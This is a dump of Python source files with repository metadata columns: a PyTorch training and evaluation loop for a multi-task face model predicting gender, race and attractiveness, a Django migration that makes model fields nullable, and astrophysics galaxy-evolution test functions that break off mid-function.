    rmse_lr = round(float(np.sqrt(mean_squared_error(np.array(gt_labels), np.array(predicted_labels).ravel()))), 4)
    pc = round(np.corrcoef(np.array(gt_labels), np.array(predicted_labels).ravel())[0, 1], 4)
    print('===============The Mean Absolute Error of ANet is {0}===================='.format(mae_lr))
    print('===============The Root Mean Square Error of ANet is {0}===================='.format(rmse_lr))
    print('===============The Pearson Correlation of ANet is {0}===================='.format(pc))
def train_hmtnet(hmt_net, train_loader, test_loader, num_epochs, inference=False):
    """Train or evaluate HMT-Net, the multi-task (gender/race/attractiveness) model.

    :param hmt_net: HMTNet model to train or evaluate
    :param train_loader: DataLoader yielding dicts with 'image', 'gender',
        'race' and 'attractiveness'
    :param test_loader: evaluation DataLoader; its 'image' tensors are 5-D
        (batch x ncrops x C x H x W) — presumably a multi-crop test
        transform such as TenCrop; TODO confirm against data_loader
    :param num_epochs: number of training epochs
    :param inference: if True, skip training and load './model/hmt-net-fbp.pth'
    :return: None (prints losses/metrics; saves per-epoch and final checkpoints)
    """
    print(hmt_net)
    device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print("We are running on", torch.cuda.device_count(), "GPUs!")
        hmt_net = nn.DataParallel(hmt_net)
    hmt_net = hmt_net.to(device)
    criterion = HMTLoss()  # combined multi-task loss over the three heads
    optimizer = optim.SGD(hmt_net.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-2)
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)
    if not inference:
        hmt_net.train()
        for epoch in range(num_epochs):  # loop over the dataset multiple times
            # NOTE(review): scheduler stepped at epoch start, before the
            # optimizer steps — the pre-1.1 PyTorch ordering; modern PyTorch
            # recommends stepping after the epoch's optimizer updates.
            exp_lr_scheduler.step()
            running_loss = 0.0
            for i, data in enumerate(train_loader, 0):
                # get the inputs for all three tasks
                inputs, gender, race, attractiveness = data['image'], data['gender'], data['race'], \
                                                       data['attractiveness']
                inputs, gender, race, attractiveness = inputs.to(device), gender.to(device), race.to(
                    device), attractiveness.float().to(device)
                # zero the parameter gradients
                optimizer.zero_grad()
                # forward + backward + optimize
                g_pred, r_pred, a_pred = hmt_net.forward(inputs)
                # NOTE(review): these views assume every batch has exactly
                # cfg['batch_size'] samples (i.e. drop_last) — TODO confirm
                g_pred = g_pred.view(cfg['batch_size'], -1)
                r_pred = r_pred.view(cfg['batch_size'], -1)
                a_pred = a_pred.view(cfg['batch_size'])
                loss = criterion(g_pred, gender, r_pred, race, a_pred, attractiveness)
                loss.backward()
                optimizer.step()
                # print statistics
                running_loss += loss.item()
                if i % 50 == 49:  # print every 50 mini-batches
                    print('[%d, %5d] loss: %.5f' % (epoch + 1, i + 1, running_loss / 50))
                    running_loss = 0.0
            # ---- per-epoch evaluation on the test set ----
            hmt_net.eval()
            predicted_attractiveness_values = []
            gt_attractiveness_values = []
            total = 0
            g_correct = 0
            r_correct = 0
            for data in test_loader:
                images, g_gt, r_gt, a_gt = data['image'], data['gender'], data['race'], \
                                           data['attractiveness']
                hmt_net = hmt_net.to(device)
                g_gt = g_gt.to(device)
                r_gt = r_gt.to(device)
                a_gt = a_gt.to(device)
                images = images.to(device)
                bs, ncrops, c, h, w = images.size()
                g_pred, r_pred, a_pred = hmt_net(images.view(-1, c, h, w))  # fuse batch size and ncrops
                a_pred = a_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
                g_pred = g_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
                r_pred = r_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
                predicted_attractiveness_values += a_pred.to("cpu").data.numpy().tolist()
                gt_attractiveness_values += a_gt.to("cpu").numpy().tolist()
                # NOTE(review): reshaping by cfg['batch_size'] here assumes
                # bs == cfg['batch_size'] for every test batch — TODO confirm
                g_pred = g_pred.view(cfg['batch_size'], -1)
                r_pred = r_pred.view(cfg['batch_size'], -1)
                _, g_predicted = torch.max(g_pred.data, 1)
                _, r_predicted = torch.max(r_pred.data, 1)
                total += g_gt.size(0)
                g_correct += (g_predicted == g_gt).sum().item()
                r_correct += (r_predicted == r_gt).sum().item()
            print('total = %d ...' % total)
            print('Gender correct sample = %d ...' % g_correct)
            print('Race correct sample = %d ...' % r_correct)
            print('Accuracy of Race Classification: %.4f' % (r_correct / total))
            print('Accuracy of Gender Classification: %.4f' % (g_correct / total))
            mae_lr = round(
                mean_absolute_error(np.array(gt_attractiveness_values),
                                    np.array(predicted_attractiveness_values).ravel()), 4)
            # NOTE(review): np.math is a deprecated alias removed in NumPy 2.0
            rmse_lr = round(np.math.sqrt(
                mean_squared_error(np.array(gt_attractiveness_values),
                                   np.array(predicted_attractiveness_values).ravel())), 4)
            pc = round(
                np.corrcoef(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())[
                    0, 1], 4)
            print('===============The Mean Absolute Error of HMT-Net is {0}===================='.format(mae_lr))
            print('===============The Root Mean Square Error of HMT-Net is {0}===================='.format(rmse_lr))
            print('===============The Pearson Correlation of HMT-Net is {0}===================='.format(pc))
            # checkpoint this epoch, then return to training mode
            model_path_dir = './model'
            file_utils.mkdirs_if_not_exist(model_path_dir)
            torch.save(hmt_net.state_dict(), os.path.join(model_path_dir, 'hmt-net-fbp-epoch-%d.pth' % (epoch + 1)))
            hmt_net.train()
        print('Finished Training')
        print('Save trained model...')
        model_path_dir = './model'
        file_utils.mkdirs_if_not_exist(model_path_dir)
        torch.save(hmt_net.state_dict(), os.path.join(model_path_dir, 'hmt-net-fbp.pth'))
    else:
        # inference-only path: load the final checkpoint and evaluate once
        print('Loading pre-trained model...')
        hmt_net.load_state_dict(torch.load(os.path.join('./model/hmt-net-fbp.pth')))
        hmt_net.eval()
        predicted_attractiveness_values = []
        gt_attractiveness_values = []
        total = 0
        g_correct = 0
        r_correct = 0
        for data in test_loader:
            images, g_gt, r_gt, a_gt = data['image'], data['gender'], data['race'], \
                                       data['attractiveness']
            hmt_net = hmt_net.to(device)
            g_gt = g_gt.to(device)
            r_gt = r_gt.to(device)
            a_gt = a_gt.to(device)
            images = images.to(device)
            bs, ncrops, c, h, w = images.size()
            g_pred, r_pred, a_pred = hmt_net(images.view(-1, c, h, w))  # fuse batch size and ncrops
            a_pred = a_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
            g_pred = g_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
            r_pred = r_pred.view(bs, ncrops, -1).mean(1)  # avg over crops
            predicted_attractiveness_values += a_pred.to("cpu").data.numpy().tolist()
            gt_attractiveness_values += a_gt.to("cpu").numpy().tolist()
            # g_pred = g_pred.view(-1, g_pred.numel())
            # r_pred = r_pred.view(-1, r_pred.numel())
            g_pred = g_pred.view(cfg['batch_size'], -1)
            r_pred = r_pred.view(cfg['batch_size'], -1)
            _, g_predicted = torch.max(g_pred.data, 1)
            _, r_predicted = torch.max(r_pred.data, 1)
            total += g_gt.size(0)
            g_correct += (g_predicted == g_gt).sum().item()
            r_correct += (r_predicted == r_gt).sum().item()
        print('total = %d ...' % total)
        print('Gender correct sample = %d ...' % g_correct)
        print('Race correct sample = %d ...' % r_correct)
        print('Accuracy of Race Classification: %.4f' % (r_correct / total))
        print('Accuracy of Gender Classification: %.4f' % (g_correct / total))
        mae_lr = round(
            mean_absolute_error(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel()), 4)
        # NOTE(review): np.math is a deprecated alias removed in NumPy 2.0
        rmse_lr = round(np.math.sqrt(
            mean_squared_error(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())), 4)
        pc = round(np.corrcoef(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())[0, 1],
                   4)
        print('===============The Mean Absolute Error of HMT-Net is {0}===================='.format(mae_lr))
        print('===============The Root Mean Square Error of HMT-Net is {0}===================='.format(rmse_lr))
        print('===============The Pearson Correlation of HMT-Net is {0}===================='.format(pc))
if __name__ == '__main__':
    # Earlier single-task experiments (GNet, RNet, ANet fine-tuning) were
    # removed; this entry point trains the multi-task HMT-Net end to end
    # on the SCUT-FBP5500 64-class split.
    print('+++++++++++++++++++++++++++++++++start training HMT-Net on SCUT-FBP5500+++++++++++++++++++++++++++++++++')
    hmt_model = HMTNet()
    train_set_loader, test_set_loader = data_loader.load_scutfbp5500_64()
    train_hmtnet(hmt_model, train_set_loader, test_set_loader, 250, False)
    print('+++++++++++++++++++++++++++++++++finish training HMT-Net SCUT-FBP5500+++++++++++++++++++++++++++++++++')
| 38.498311
| 120
| 0.569699
| 2,824
| 22,791
| 4.40687
| 0.081445
| 0.026356
| 0.017356
| 0.019285
| 0.887184
| 0.882764
| 0.870068
| 0.856649
| 0.846364
| 0.834552
| 0
| 0.019389
| 0.273573
| 22,791
| 591
| 121
| 38.563452
| 0.732302
| 0.134615
| 0
| 0.747945
| 0
| 0
| 0.13343
| 0.02179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.057534
| 0
| 0.071233
| 0.153425
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce58b10137da4636163eeb5be212907139406173
| 3,749
|
py
|
Python
|
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-03-01 19:54
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration (Django 4.0.2, 2022-03-01).

    Relaxes a set of fields to allow NULL/blank values: the soft-delete
    timestamp ``deletedAt`` on most models, several date fields, and a few
    foreign keys (switched to SET_NULL/CASCADE with null=True).

    NOTE: 'teasurer' and 'montlypayment' are misspelled model names that
    already exist in the project's schema — do not "correct" them here or
    the migration will no longer match the recorded migration state.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('core', '0013_remove_partner_message'),
    ]

    operations = [
        migrations.AlterField(
            model_name='cashier',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='demand',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='demand',
            name='teasurer',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.teasurer'),
        ),
        migrations.AlterField(
            model_name='financialtransaction',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='justification',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='justification',
            name='member',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.member'),
        ),
        migrations.AlterField(
            model_name='member',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='member',
            name='user',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='montlypayment',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='montlypayment',
            name='dueDate',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='president',
            name='endMandate',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='request',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='request',
            name='president',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.president'),
        ),
        migrations.AlterField(
            model_name='trip',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='trip',
            name='endDate',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='usevehicle',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='usevehicle',
            name='member',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.member'),
        ),
        migrations.AlterField(
            model_name='vehicle',
            name='deletedAt',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
| 35.037383
| 133
| 0.580955
| 354
| 3,749
| 6.053672
| 0.175141
| 0.167989
| 0.209986
| 0.243584
| 0.788147
| 0.788147
| 0.734018
| 0.734018
| 0.734018
| 0.708819
| 0
| 0.007235
| 0.299547
| 3,749
| 106
| 134
| 35.367925
| 0.808835
| 0.012003
| 0
| 0.77
| 1
| 0
| 0.104808
| 0.007293
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03
| 0
| 0.06
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce9464c524b8048f1a0cc05006b5d220d3c01791
| 49,831
|
py
|
Python
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | 1
|
2018-05-30T23:43:52.000Z
|
2018-05-30T23:43:52.000Z
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | 2
|
2017-04-24T22:58:40.000Z
|
2017-04-24T22:59:28.000Z
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
import env
import catalog as Cat
import evolver as Evol
import observables as Obvs
import util as UT
import matplotlib.pyplot as plt
import corner as DFM
from ChangTools.plotting import prettyplot
from ChangTools.plotting import prettycolors
def test_Evolver_time(sfh, nsnap0=None, downsampled=None, tduty=1., abias=0.):
    ''' Time how long a single run of the evolver takes from start to finish

    Parameters
    ----------
    sfh : str
        name of the SFH prescription passed to Evol.defaultTheta
    nsnap0 : int, optional
        ancestor snapshot of the PureCentralHistory catalog
    downsampled : optional
        downsampling flag forwarded to subhist.Read
    tduty : float
        duty-cycle timescale used only for 'random_step' SFH schemes
    abias : float
        assembly-bias correlation strength; > 0 switches assembly bias on

    NOTE: Python 2 module (print statements); timings are written to stdout.
    '''
    # set parameter values
    theta = Evol.defaultTheta(sfh)
    if 'random_step' in sfh:
        theta['sfh']['dt_min'] = tduty
        theta['sfh']['dt_max'] = tduty
        theta['mass']['t_step'] = 0.05
        # the mass-integration step must be fine enough to resolve the duty cycle
        if theta['mass']['t_step'] > tduty/10.:
            theta['mass']['t_step'] = tduty/10.
        if abias > 0.:
            theta['sfh']['t_abias'] = 2. # assembly bias timescale
            theta['sfh']['sigma_corr'] = abias
        else:
            theta['sfh']['t_abias'] = None # assembly bias timescale
    # read in the central subhalo catalog
    t_cat = time.time()
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    subcat = subhist.Read(downsampled=downsampled)
    print (time.time() - t_cat), 'seconds to read pure central catalog'
    # run it through the evolver
    t_evo = time.time()
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    print (time.time() - t_evo), 'seconds to initiate'
    t_evo = time.time()
    eev.Evolve()
    print (time.time() - t_evo), 'seconds to evolve'
    return None
def test_Evolver_logSFRinitiate(sfh, nsnap0=None):
    ''' Test the log(SFR) initiate step within Evolver.Evolve()

    Runs the evolver with forTests=True, then visualizes the SFR keyword
    arguments it generated: for 'random_step'/'random_step_fluct' the
    dlogSFR amplitudes versus time steps of 10 random galaxies; for
    'random_step_abias' the (dMhalo, dlogSFR_corr) correlation scatter.
    Raises NotImplementedError for any other SFH scheme.
    '''
    # load in Subhalo Catalog (pure centrals)
    subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
    print subhist.File()
    subcat = subhist.Read()
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta(sfh)
    for k in theta.keys():
        print k, '---', theta[k]
    eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
    eev.Initiate()
    # forTests=True stops Evolve() early so sfr_kwargs can be inspected
    eev.Evolve(forTests=True)
    #subcat = eev.SH_catalog
    sfr_kwargs = eev.sfr_kwargs # SFR keyword arguments
    #logSFR_logM_z = self.logSFR_logM_z # logSFR(logM, z) function
    prettyplot()
    pretty_colors = prettycolors()
    if sfh in ['random_step', 'random_step_fluct']:
        #print 'dlogSFR_amp', sfr_kwargs['dlogSFR_amp'].shape
        #print 'tsteps', sfr_kwargs['tsteps'].shape
        # pick 10 random galaxies and plot their dlogSFR step histories
        i_rand = np.random.choice(range(sfr_kwargs['dlogSFR_amp'].shape[0]), size=10, replace=False)
        fig = plt.figure()
        sub = fig.add_subplot(111)
        for ii in i_rand:
            #print sfr_kwargs['tsteps'][ii, :]
            #print sfr_kwargs['dlogSFR_amp'][ii, :]
            sub.plot(sfr_kwargs['tsteps'][ii, :], sfr_kwargs['dlogSFR_amp'][ii, :])
        sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
        plt.show()
    elif sfh in ['random_step_abias']:
        i_rand = np.random.choice(range(sfr_kwargs['dlogSFR_amp'].shape[0]), size=10, replace=False)
        fig = plt.figure()
        sub = fig.add_subplot(111)
        for ii in i_rand: #range(sfr_kwargs['dlogSFR_amp'].shape[1]):
            #print sfr_kwargs['tsteps'][ii, :]
            #print sfr_kwargs['dlogSFR_amp'][ii, :]
            sub.scatter(sfr_kwargs['dMhalos'][ii,:], sfr_kwargs['dlogSFR_corr'][ii,:])
        sub.set_xlim([-0.2, 0.2])
        sub.set_ylim([-3.*theta['sfh']['sigma_corr'], 3.*theta['sfh']['sigma_corr']])
        plt.show()
    else:
        raise NotImplementedError
    return None
def test_Evolver_ODEsolver(sfh, nsnap0=None):
    ''' Test the ODE solver in the Evolver. We compare the results between Euler
    ODE solver and the scipy integrate odeint's fancy solver.
    ========================================
    COMPARISON SHOWS GOOD AGREEMENT.
    ========================================

    One row of panels per solver: left panel compares the integrated SMF
    against SHAM, right panel shows the SMHMR with the sigma_logM* at
    M_h = 10^12 annotated. Figure saved to UT.fig_dir().
    '''
    solvers = ['euler', 'scipy']
    prettyplot()
    pretty_colors = prettycolors()
    fig = plt.figure(figsize=(18, 7*len(solvers)))
    for i_s, solver in enumerate(solvers):
        # load in Subhalo Catalog (pure centrals)
        subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
        print subhist.File()
        subcat = subhist.Read()
        # load in generic theta (parameter values)
        theta = Evol.defaultTheta(sfh)
        theta['mass']['solver'] = solver
        for k in theta.keys():
            print k, '---', theta[k]
        eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
        eev.Initiate()
        eev.Evolve()
        isSF = np.where(subcat['gclass'] == 'star-forming')[0]
        # NOTE(review): subplot index uses i_s*len(solvers)+1; correct only
        # because len(solvers) == ncols == 2 here — confirm if solvers change.
        sub = fig.add_subplot(len(solvers),2,i_s*len(solvers)+1)
        for n in range(2, nsnap0+1)[::-1]:
            # identify SF population at snapshot
            smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
                weights=subcat['weights'][isSF])
            sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
        smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
        smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
        sub.set_xlim([6.75, 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylim([1e-5, 10**-1.75])
        sub.set_yscale('log')
        sub.set_ylabel('log $\Phi$', fontsize=25)
        sub.legend(loc='upper right')
        # mark the solver type
        sub.text(0.15, 0.9, solver.upper(), ha='center', va='center',
            transform=sub.transAxes)
        sub = fig.add_subplot(len(solvers),2,i_s*len(solvers)+2)
        smhmr = Obvs.Smhmr()
        m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
        sig_mstar_mh12 = smhmr.sigma_logMstar(subcat['halo.m'][isSF], subcat['m.star'][isSF], Mhalo=12.)
        sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
        sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
        sub.text(0.3, 0.9, '$\sigma_{log\, M*}(M_h = 10^{12} M_\odot)$ ='+str(round(sig_mstar_mh12, 3)),
            ha='center', va='center', transform=sub.transAxes)
        sub.set_xlim([10.5, 14.])
        sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
        sub.set_ylim([8., 12.])
        sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
    fig.savefig(''.join([UT.fig_dir(), sfh+'_ODEsolver.png']), bbox_inches='tight')
    plt.close()
    return None
def test_RandomStep_timescale(sig_smhm=None, nsnap_ancestor=20):
    ''' Test the impact of the timescale for random step SFH scheme

    For each duty-cycle timescale tstep in [0.05, 0.01] the catalog is
    re-evolved and a 3-panel figure (SMF vs SHAM, SMHMR, Delta log SFR
    histories of one random galaxy per mass bin) is saved to UT.fig_dir().
    '''
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta('random_step')
    for tstep in [0.01, 0.05][::-1]:
        theta['sfh'] = {'name': 'random_step',
            'dt_min': tstep, 'dt_max': tstep, 'sigma': 0.3}
        # integration step must resolve the SFH duty cycle
        theta['mass']['t_step'] = np.min([0.05, tstep/10.])
        # load in Subhalo Catalog (pure centrals)
        subhist = Cat.PureCentralHistory(sigma_smhm=sig_smhm, nsnap_ancestor=nsnap_ancestor)
        subcat = subhist.Read()
        eev = Evol.Evolver(subcat, theta, nsnap0=nsnap_ancestor)
        eev.Initiate()
        eev.Evolve()
        subcat = eev.SH_catalog
        #prettyplot()
        pretty_colors = prettycolors()
        isSF = np.where(subcat['gclass'] == 'star-forming')[0]
        fig = plt.figure(figsize=(25,7))
        # panel 1: SMF evolution of the SF population vs SHAM
        sub = fig.add_subplot(1,3,1)
        for n in range(2, nsnap_ancestor+1)[::-1]:
            # identify SF population at snapshot
            smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
                weights=subcat['weights'][isSF])
            sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
        smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
        smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
        sub.set_xlim([6.75, 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylim([1e-5, 10**-1.75])
        sub.set_yscale('log')
        sub.set_ylabel('log $\Phi$', fontsize=25)
        sub.legend(loc='upper right')
        # panel 2: stellar-to-halo mass relation
        sub = fig.add_subplot(1,3,2)
        smhmr = Obvs.Smhmr()
        m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
        sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
        sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
        # also plot the SHAM SMHMR
        m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
        sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
        sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
        sub.set_xlim([10.5, 14.])
        sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
        sub.set_ylim([8., 12.])
        sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
        # panel 3: Delta log SFR history of one random galaxy per M* bin
        isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap_ancestor))[0]
        m_bin = np.arange(9.0, 12.5, 0.5)
        i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
        sub = fig.add_subplot(1,3,3)
        for i in np.unique(i_bin):
            i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
            # offset from the SFMS at the starting snapshot
            dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
                subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap_ancestor),
                theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
            sub.text(UT.t_nsnap(nsnap_ancestor - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
            for nn in range(2, nsnap_ancestor)[::-1]:
                M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
                mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
                dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
            mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
                UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
            dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
            sub.plot(UT.t_nsnap(range(1, nsnap_ancestor+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
        # +/- 0.3 dex band around the SFMS for reference
        sub.plot([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
        sub.plot([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
        sub.set_xlim([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)])
        sub.set_xlabel('$t_{cosmic}$', fontsize=25)
        sub.set_ylim([-1., 1.])
        sub.set_ylabel('$\Delta$log SFR', fontsize=25)
        fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
        fig.savefig(
            ''.join([UT.fig_dir(), 'random_step.nsnap0_', str(nsnap_ancestor),
                '.sigmaSMHM', str(sig_smhm), '.tstep', str(tstep), '.png']),
            bbox_inches='tight')
        plt.close()
        del subhist
    return None
def EvolverQAplots(subcat, theta, savefig=None):
    ''' Given an evolved subhalo catalog, make the standard 3-panel QA
    figure: SMF evolution vs SHAM, SMHMR, and Delta log SFR histories of
    one random galaxy per stellar-mass bin.

    Parameters
    ----------
    subcat : dict
        evolved subhalo catalog (e.g. Evolver.SH_catalog); must contain
        'nsnap0', 'gclass', 'weights', and the snapshot mass/SFR columns
    theta : dict
        parameter dictionary; theta['sfms'] is passed to Obvs.SSFR_SFMS
    savefig : str, optional
        output file name (appended to UT.fig_dir()). If given, the figure
        is saved and closed and None is returned; otherwise the matplotlib
        Figure object is returned.

    Returns
    -------
    None when savefig is given, otherwise the Figure.
    '''
    prettyplot()
    pretty_colors = prettycolors()
    nsnap0 = subcat['nsnap0']
    isSF = np.where(subcat['gclass'] == 'star-forming')[0]
    fig = plt.figure(figsize=(25,7))
    # panel 1: SMF evolution of the SF population vs SHAM
    sub = fig.add_subplot(1,3,1)
    for n in range(2, nsnap0+1)[::-1]:
        # identify SF population at snapshot
        smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
            weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
    smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
    sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
    smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
    sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
    sub.set_xlim([6.75, 12.])
    sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
    sub.set_ylim([1e-5, 10**-1.75])
    sub.set_yscale('log')
    sub.set_ylabel('log $\Phi$', fontsize=25)
    sub.legend(loc='upper right')
    # panel 2: stellar-to-halo mass relation (integrated vs SHAM)
    sub = fig.add_subplot(1,3,2)
    smhmr = Obvs.Smhmr()
